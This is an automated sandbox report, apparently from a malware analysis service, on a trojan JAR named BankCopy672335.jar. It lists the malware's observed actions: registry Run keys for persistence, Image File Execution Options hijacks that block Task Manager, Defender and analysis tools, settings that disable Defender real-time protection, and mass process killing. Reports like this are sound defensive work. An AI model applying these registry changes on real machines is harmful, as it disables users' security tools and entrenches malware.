78506861635b537bdfd939c5fad8265ee1e0153c59aabac5d3aad5da8b9d8aaa

Analysis

max time kernel
149s
max time network
143s
platform
windows7_x64
resource
win7
submitted
30-06-2020 05:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BankCopy672335.jar
Size

406KB
MD5

ca5d430caea361879fcfb90e54cc2510
SHA1

8be576b34f77727f67c2c3ba8d26b425ff673122
SHA256

78506861635b537bdfd939c5fad8265ee1e0153c59aabac5d3aad5da8b9d8aaa
SHA512

02f0324a5e428819de8c30e862da1bbd328ec532a9097305795418293b935e3ea0af5c71ba1df4429db0ab5b9636fdfa8170002c193abb8805d031c6b872faa6

Score

10^/10

persistence evasion trojan discovery

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

java.exe

pid process

1124 java.exe
Disables Task Manager via registry modification
evasion
Drops file in System32 directory 2 IoCs

Processes:

java.exe

description ioc process

File created C:\Windows\System32\OqPOP java.exe
File opened for modification C:\Windows\System32\OqPOP java.exe
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Loads dropped DLL 1 IoCs

Processes:

java.exe

pid process

1124 java.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1920 powershell.exe
1920 powershell.exe

pid	process
1124	java.exe

description	ioc	process
File created	C:\Windows\System32\OqPOP	java.exe
File opened for modification	C:\Windows\System32\OqPOP	java.exe

pid	process
1124	java.exe

pid	process
1920	powershell.exe
1920	powershell.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

java.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\lfCNqna = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\vIXib\\FXswr.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\lfCNqna = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\vIXib\\FXswr.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe

Kills process with taskkill 19 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1884	taskkill.exe
1400	taskkill.exe
828	taskkill.exe
1496	taskkill.exe
1848	taskkill.exe
268	taskkill.exe
1876	taskkill.exe
1612	taskkill.exe
1032	taskkill.exe
1612	taskkill.exe
388	taskkill.exe
1084	taskkill.exe
1096	taskkill.exe
2036	taskkill.exe
1196	taskkill.exe
2004	taskkill.exe
616	taskkill.exe
1476	taskkill.exe
1620	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes = "-"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\SaveZoneInformation = "-"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations	reg.exe

Drops desktop.ini file(s) 4 IoCs

Processes:

attrib.exeattrib.exejava.exe

description	ioc	process
File opened for modification	C:\Users\Admin\vIXib\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\vIXib\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\vIXib\Desktop.ini	java.exe
File created	C:\Users\Admin\vIXib\Desktop.ini	java.exe

Checks for installed software on the system 1 TTPs 52 IoCs

discovery

Query Registry

T1012

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe

Suspicious use of WriteProcessMemory 798 IoCs

Processes:

java.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1124 wrote to memory of 912	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 912	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 912	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1616	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1616	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1616	1124	java.exe	cmd.exe
PID 1616 wrote to memory of 344	1616	cmd.exe	WMIC.exe
PID 1616 wrote to memory of 344	1616	cmd.exe	WMIC.exe
PID 1616 wrote to memory of 344	1616	cmd.exe	WMIC.exe
PID 1124 wrote to memory of 1088	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1088	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1088	1124	java.exe	cmd.exe
PID 1088 wrote to memory of 1112	1088	cmd.exe	WMIC.exe
PID 1088 wrote to memory of 1112	1088	cmd.exe	WMIC.exe
PID 1088 wrote to memory of 1112	1088	cmd.exe	WMIC.exe
PID 1124 wrote to memory of 1712	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1712	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1712	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1808	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1808	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1808	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1392	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1392	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1392	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1820	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1820	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1820	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1848	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1848	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1848	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1404	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1404	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1404	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1792	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1792	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1792	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1852	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1852	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1852	1124	java.exe	attrib.exe
PID 1124 wrote to memory of 1584	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1584	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1584	1124	java.exe	cmd.exe
PID 1124 wrote to memory of 1612	1124	java.exe	taskkill.exe
PID 1124 wrote to memory of 1612	1124	java.exe	taskkill.exe
PID 1124 wrote to memory of 1612	1124	java.exe	taskkill.exe
PID 1124 wrote to memory of 1580	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1580	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1580	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1624	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1624	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1624	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1920	1124	java.exe	powershell.exe
PID 1124 wrote to memory of 1920	1124	java.exe	powershell.exe
PID 1124 wrote to memory of 1920	1124	java.exe	powershell.exe
PID 1584 wrote to memory of 1876	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 1876	1584	cmd.exe	reg.exe
PID 1584 wrote to memory of 1876	1584	cmd.exe	reg.exe
PID 1124 wrote to memory of 1972	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1972	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1972	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1940	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1940	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1940	1124	java.exe	reg.exe
PID 1124 wrote to memory of 1052	1124	java.exe	reg.exe

Suspicious use of AdjustPrivilegeToken 100 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	344	WMIC.exe
Token: SeSecurityPrivilege	344	WMIC.exe
Token: SeTakeOwnershipPrivilege	344	WMIC.exe
Token: SeLoadDriverPrivilege	344	WMIC.exe
Token: SeSystemProfilePrivilege	344	WMIC.exe
Token: SeSystemtimePrivilege	344	WMIC.exe
Token: SeProfSingleProcessPrivilege	344	WMIC.exe
Token: SeIncBasePriorityPrivilege	344	WMIC.exe
Token: SeCreatePagefilePrivilege	344	WMIC.exe
Token: SeBackupPrivilege	344	WMIC.exe
Token: SeRestorePrivilege	344	WMIC.exe
Token: SeShutdownPrivilege	344	WMIC.exe
Token: SeDebugPrivilege	344	WMIC.exe
Token: SeSystemEnvironmentPrivilege	344	WMIC.exe
Token: SeRemoteShutdownPrivilege	344	WMIC.exe
Token: SeUndockPrivilege	344	WMIC.exe
Token: SeManageVolumePrivilege	344	WMIC.exe
Token: 33	344	WMIC.exe
Token: 34	344	WMIC.exe
Token: 35	344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	344	WMIC.exe
Token: SeSecurityPrivilege	344	WMIC.exe
Token: SeTakeOwnershipPrivilege	344	WMIC.exe
Token: SeLoadDriverPrivilege	344	WMIC.exe
Token: SeSystemProfilePrivilege	344	WMIC.exe
Token: SeSystemtimePrivilege	344	WMIC.exe
Token: SeProfSingleProcessPrivilege	344	WMIC.exe
Token: SeIncBasePriorityPrivilege	344	WMIC.exe
Token: SeCreatePagefilePrivilege	344	WMIC.exe
Token: SeBackupPrivilege	344	WMIC.exe
Token: SeRestorePrivilege	344	WMIC.exe
Token: SeShutdownPrivilege	344	WMIC.exe
Token: SeDebugPrivilege	344	WMIC.exe
Token: SeSystemEnvironmentPrivilege	344	WMIC.exe
Token: SeRemoteShutdownPrivilege	344	WMIC.exe
Token: SeUndockPrivilege	344	WMIC.exe
Token: SeManageVolumePrivilege	344	WMIC.exe
Token: 33	344	WMIC.exe
Token: 34	344	WMIC.exe
Token: 35	344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe
Token: SeSystemProfilePrivilege	1112	WMIC.exe
Token: SeSystemtimePrivilege	1112	WMIC.exe
Token: SeProfSingleProcessPrivilege	1112	WMIC.exe
Token: SeIncBasePriorityPrivilege	1112	WMIC.exe
Token: SeCreatePagefilePrivilege	1112	WMIC.exe
Token: SeBackupPrivilege	1112	WMIC.exe
Token: SeRestorePrivilege	1112	WMIC.exe
Token: SeShutdownPrivilege	1112	WMIC.exe
Token: SeDebugPrivilege	1112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1112	WMIC.exe
Token: SeRemoteShutdownPrivilege	1112	WMIC.exe
Token: SeUndockPrivilege	1112	WMIC.exe
Token: SeManageVolumePrivilege	1112	WMIC.exe
Token: 33	1112	WMIC.exe
Token: 34	1112	WMIC.exe
Token: 35	1112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1112	WMIC.exe
Token: SeSecurityPrivilege	1112	WMIC.exe
Token: SeTakeOwnershipPrivilege	1112	WMIC.exe
Token: SeLoadDriverPrivilege	1112	WMIC.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Views/modifies file attributes 1 TTPs 8 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1808 attrib.exe
1392 attrib.exe
1820 attrib.exe
1848 attrib.exe
1404 attrib.exe
1792 attrib.exe
1852 attrib.exe
1712 attrib.exe

pid	process
1808	attrib.exe
1392	attrib.exe
1820	attrib.exe
1848	attrib.exe
1404	attrib.exe
1792	attrib.exe
1852	attrib.exe
1712	attrib.exe

Sets file execution options in registry 2 TTPs 38 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\BankCopy672335.jar
1⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Loads dropped DLL
- Adds Run entry to start application
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:912

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:344

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\Wbem\WMIC.exe
